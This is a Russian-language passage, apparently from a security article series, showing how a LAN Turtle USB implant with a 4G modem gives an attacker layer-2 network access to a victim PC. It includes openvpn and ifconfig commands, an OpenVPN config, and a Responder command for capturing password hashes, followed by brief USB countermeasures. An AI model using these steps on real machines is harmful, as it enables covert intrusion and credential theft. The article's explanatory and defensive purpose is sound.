L2VPN-интерфейс будет иметь IP-адрес, который на самом деле не нужен, поскольку уже работает OpenVPN. Но его можно сбросить, после чего просто поместить интерфейс в мост. В результате в VPN-интерфейс пойдут L2пакеты от скомпрометированной машины. И атакующий не просто получит логический сетевой доступ до целевого ПК, он будет видеть его, словно воткнулся в ПК простым интернет-кабелем.
На стороне атакующего требуется лишь подключиться к модему и создать VPN-туннель, после чего вручную выставить ему IP-адрес из подсети сетевого адаптера компьютера жертвы:
sudo openvpn --config lan_turtle.ovpn --route-noexec
sudo ifconfig tap0 192.168.8.200/24
Конфигурационный файл для подключения к lan_turtle, чтобы открыть L2VPNтуннель, выглядит так:
lan_turtle.ovpn local 172.16.0.10
port 1194
proto tcp
dev tap
user nobody
<ca>
</ca>
<cert>
</cert>
<key>
</key>
<dh>
</dh>
server 192.168.9.0 255.255.255.0
keepalive 10 180
verb 3
Теперь злоумышленник получит максимально полный сетевой доступ к компьютеру через 4G-модем. L2-туннель позволяет запустить атаки на проколы канального уровня, а также на NetBIOS с помощью Responder и получить хеш пароля пользователя:
responder -I tap0 -r -d -w -F
КАК ЗАЩИТИТЬСЯ
Поскольку закрепляется злоумышленник через USB-порт, меры противодействия такие же, что и в случае с BadUSB:
•использовать специализированные программные решения, чтобы блокировать недоверенные USB-устройства;
•отключить поддержку сетевых карт USB в групповых политиках;
•регулярно осматривать компьютеры;
•контролировать физический доступ к ПК.
На этом всё, встретимся в следующей части цикла!